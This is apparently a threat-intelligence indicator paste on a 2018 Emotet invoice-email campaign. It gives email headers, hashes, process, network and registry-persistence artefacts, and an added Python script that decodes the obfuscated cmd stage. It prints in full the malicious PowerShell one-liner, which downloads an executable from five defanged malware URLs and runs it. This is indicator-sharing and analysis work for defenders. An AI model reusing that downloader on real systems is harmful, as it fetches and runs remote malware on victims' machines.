- #IOC #OptiData #VR #Emotet #W97M #Macro #powershell
- https://pastebin.com/Y6DnbpHv
- email_headers
- --------------
- #1
- Received: from a27-50.smtp-out.us-west-2.amazonses{.} com (a27-50.smtp-out.us-west-2.amazonses{.} com [54.240.27.50])
- by mailsrv.victim{.} com (8.15.2/8.15.2) with ESMTP id w918l0k9089312
- for <user1@victim{.} com>; Mon, 1 Oct 2018 11:47:00 +0300 (EEST)
- (envelope-from 010101662ecf0227-5c3272a9-ff0e-4f05-9508-b53355b30f17-000000@us-west-2.amazonses{.} com)
- Date: Mon, 1 Oct 2018 08:46:50 +0000
- From: Интернет-магазин С торгом <ar@champlungmaslegian{.} com>   [Russian display name: "Online Store With Bargaining"]
- To: user1@victim{.} com
- Subject: Invoice from Интернет-магазин С торгом   ["Invoice from Online Store With Bargaining"]
- #2
- Received-PRA: pass ;
- Received-SPF: pass ;
- Received: from mail.btconnect{.} com (rdslmr.btconnect{.} com [62.239.164.79]) by mail2.victim2{.} com with smtp id 70c8_00a5_2d799447_045b_463e_aea7_60b44e018a09;
- Mon, 01 Oct 2018 11:46:29 +0300
- Received: from mail.btconnect{.} com (rd11780omr12.iuser.iroot.adidom{.} com [10.187.89.173])
- by rd11780slr11.dci.bt{.} com (MOS 4.4.8-GA)
- with ESMTP id AMS19190;
- Mon, 1 Oct 2018 09:46:27 +0100
- Received: (from localhost [127.0.0.1])
- by rd11780omr12.dci.bt{.} com (MOS 4.4.8-GA)
- id QYL41356;
- Mon, 1 Oct 2018 09:46:27 +0100 (BST)
- Received: from router-heim.i-netpartner{.} net (EHLO 10.5.21.12) ([217.23.56.98])
- by rd11780omr12.dci.bt{.} com
- with ESMTP id QYL41299 (AUTH parkhillvets@btconnect{.} com);
- Mon, 01 Oct 2018 09:46:26 +0100 (BST)
- Date: Mon, 01 Oct 2018 10:46:26 +0100
- From: Ващенко Інна <inna@razumkov{.} org{.} ua> <parkhillvets@btconnect{.} com>   [Ukrainian display name: "Inna Vashchenko"; the inna@ address is only display text, the real sender is the btconnect account seen in the AUTH field of the Received header above]
- To: user2@victim2
- Subject: Invoice from Ващенко Інна   ["Invoice from Inna Vashchenko"]
- files
- --------------
- SHA-256 84803f2f3f575a5cb48fd7eabd9b0e8e73776b2fd8f3b3e098c8709d282c7fd7
- File name FILE_58873.doc
- File size 66.63 KB
- SHA-256 fe516708fe6db062b525795e67100e846257135e5a30526839ed405bf05ed4a5
- File name U5CUyRF7hzz.exe
- File size 184 KB
- h11p: \gidamikrobiyoloji{.} com/IBfAlRX
- h11p: \madisonda{.} com/BacOqsvFqz
- h11p: \motiondev{.} com{.} br/1cTvBSu2P
- h11p: \fluorescent{.} cc/KxcY1d6R
- h11p: \kristianmarlow{.} com/Sy5IRFsRU9
- powershell $Knq=new-object Net.WebClient;$ibh='h11p: \gidamikrobiyoloji{.} com/IBfAlRX@h11p: \madisonda{.} com/BacOqsvFqz@h11p: \motiondev{.} com{.} br/1cTvBSu2P@h11p: \fluorescent{.} cc/KxcY1d6R@h11p: \kristianmarlow{.} com/Sy5IRFsRU9'.Split('@');$tFI = '992';$KMF=$env:public+'\'+$tFI+'.exe';foreach($HAE in $ibh){try{$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}
- activity
- **************
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\CMd.exe /V/C"^s^e^t ^B^J^1=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}{^hc^t^ac}^;^k^a^er^b^;^F^M^K^$^ ^m^e^t^I-^e^k^ovn^I^;)^F^M^K^$^ ,E^A^H^$(^e^l^i^F^d^a^o^ln^w^o^D^.^qn^K^$^{^yrt^{)h^b^i^$^ n^i^ ^E^A^H^$(^hc^a^er^of^;^'^e^x^e^.^......
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $Knq=new-object Net.WebClient;$ibh='h11p: \gidamikrobiyoloji{.} com/IBfAlRX@h11p: \madisonda{.} com/BacOqsvFqz@h11p: \motiondev{.} com{.} br/1cTvBSu2P@h11p: \fluorescent{.} cc/KxcY1d6R@h11p: \kristianmarlow{.} com/Sy5IRFsRU9'.Split('@');$tFI = '992';$KMF=$env:public+'\'+$tFI+'.exe';foreach($HAE in $ibh){try{$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}
- "C:\Users\Public\992.exe"
- "C:\Users\operator\AppData\Local\Microsoft\Windows\xpathcab.exe"
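The two `proc` lines for CMd.exe and powershell.exe are one chain: cmd stores the PowerShell one-liner backwards in an environment variable, every character caret-escaped, and the page only shows the start of that `set` statement (it is cut off at "......"). The script below is an added example, not part of the original paste: it strips the caret escapes, reverses the variable, checks that the recovered tail is the tail of the powershell.exe line, and then pulls the URL list, drop path and post-download behaviour out of the WebClient.DownloadFile loop. Both sample strings are copied from the `proc` section above with the URLs left defanged; the %PUBLIC% value is an assumption that matches the "C:\Users\Public\992.exe" entry.

```python
"""Decode the cmd.exe -> powershell.exe downloader stage listed under `proc`.

Added example, not part of the original paste. The two sample strings are
copied from the page's own `proc` lines; the cmd.exe fragment is truncated
on the page (it ends in "......"), so only its tail is recoverable.
"""
import re
from typing import Dict, List, Tuple

# cmd.exe argument as printed on the page (after `/V/C"`). `^` is cmd's
# escape character, so `^X` is the literal X; the payload is stored backwards.
CMD_FRAGMENT = (
    r"^s^e^t ^B^J^1=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}{^hc^t^ac}^;^k^a^er^b^;"
    r"^F^M^K^$^ ^m^e^t^I-^e^k^ovn^I^;)^F^M^K^$^ ,E^A^H^$(^e^l^i^F^d^a^o^ln^w^o^D^.^qn^K^$"
    r"^{^yrt^{)h^b^i^$^ n^i^ ^E^A^H^$(^hc^a^er^of^;^'^e^x^e^.^......"
)

# powershell.exe argument as printed on the page (URLs kept defanged).
PS_ONELINER = (
    "$Knq=new-object Net.WebClient;"
    "$ibh='h11p: \\gidamikrobiyoloji{.} com/IBfAlRX@h11p: \\madisonda{.} com/BacOqsvFqz"
    "@h11p: \\motiondev{.} com{.} br/1cTvBSu2P@h11p: \\fluorescent{.} cc/KxcY1d6R"
    "@h11p: \\kristianmarlow{.} com/Sy5IRFsRU9'.Split('@');"
    "$tFI = '992';$KMF=$env:public+'\\'+$tFI+'.exe';"
    "foreach($HAE in $ibh){try{$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}"
)

# Assumed value of %PUBLIC%; it matches the "C:\Users\Public\992.exe" proc entry.
PUBLIC_DIR = r"C:\Users\Public"


def unescape_cmd(s: str) -> str:
    """Strip cmd.exe caret escapes: '^^' -> '^', '^X' -> 'X'."""
    out: List[str] = []
    i = 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def decode_set_var(fragment: str) -> Tuple[str, str]:
    """Return (variable name, payload read forwards) for `set NAME=<reversed text>`.

    The run of spaces cmd stores at the front of the variable becomes trailing
    padding once the text is reversed, so it is stripped.
    """
    plain = unescape_cmd(fragment)
    m = re.match(r"\s*set\s+(\w+)=(.*)\Z", plain, re.IGNORECASE | re.DOTALL)
    if not m:
        raise ValueError("fragment does not start with a cmd `set` statement")
    return m.group(1), m.group(2)[::-1].rstrip()


def parse_downloader(ps: str) -> Dict[str, object]:
    """Extract URL list, drop path and post-download behaviour from the
    WebClient.DownloadFile loop used by this sample."""
    url_list = re.search(r"='([^']*)'\.Split\('@'\)", ps)
    if not url_list:
        raise ValueError("no '@'-joined URL list found")
    # Matches:  $tFI = '992';$KMF=$env:public+'\'+$tFI+'.exe'
    drop = re.search(r"\$(\w+)\s*=\s*'([^']+)';\$\w+=\$env:public\+'\\'\+\$\1\+'\.exe'", ps)
    if not drop:
        raise ValueError("no %PUBLIC% drop-path expression found")
    return {
        "urls": url_list.group(1).split("@"),
        "drop_path": PUBLIC_DIR + "\\" + drop.group(2) + ".exe",
        # Invoke-Item runs the file; `break` stops at the first host that answers,
        # which is why only one of the five hosts shows up in the netwrk section.
        "runs_after_download": "Invoke-Item" in ps,
        "stops_after_first_success": ";break;" in ps,
    }


def cmd_payload_matches_powershell(decoded_tail: str, ps: str) -> bool:
    """True when the recovered (truncated) cmd payload is the tail of the
    powershell.exe command line, i.e. the two proc entries are one chain."""
    return ps.endswith(decoded_tail.lstrip("."))


if __name__ == "__main__":
    name, payload = decode_set_var(CMD_FRAGMENT)
    print(f"{name} holds (reversed on disk): {payload}")
    print("same chain as powershell.exe line:",
          cmd_payload_matches_powershell(payload, PS_ONELINER))
    for key, value in parse_downloader(PS_ONELINER).items():
        print(f"{key}: {value}")
```

The leading dots in the decoded variable are the page's own truncation marker read backwards, not part of the malware; the recovered text is the `foreach ... Invoke-Item ... break` tail of the powershell.exe entry, so the parser works on that line directly.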
- netwrk
- --------------
- 185.179.26.24 gidamikrobiyoloji{.} com GET /IBfAlRX/ HTTP/1.1 (no User-Agent header sent)
- "190.2.50.193","190.2.50.193:443","GET / HTTP/1.1 ","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
- comp
- --------------
- powershell.exe 1556 185.179.26.24 80 ESTABLISHED
- xpathcab.exe 3720 190.215.241.14 8080 SYN_SENT
- xpathcab.exe 3720 190.2.50.193 443 SYN_SENT
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 01.10.2018 14:22
- xpathcab c:\users\operator\appdata\local\microsoft\windows\xpathcab.exe 01.10.2018 13:00
- # # #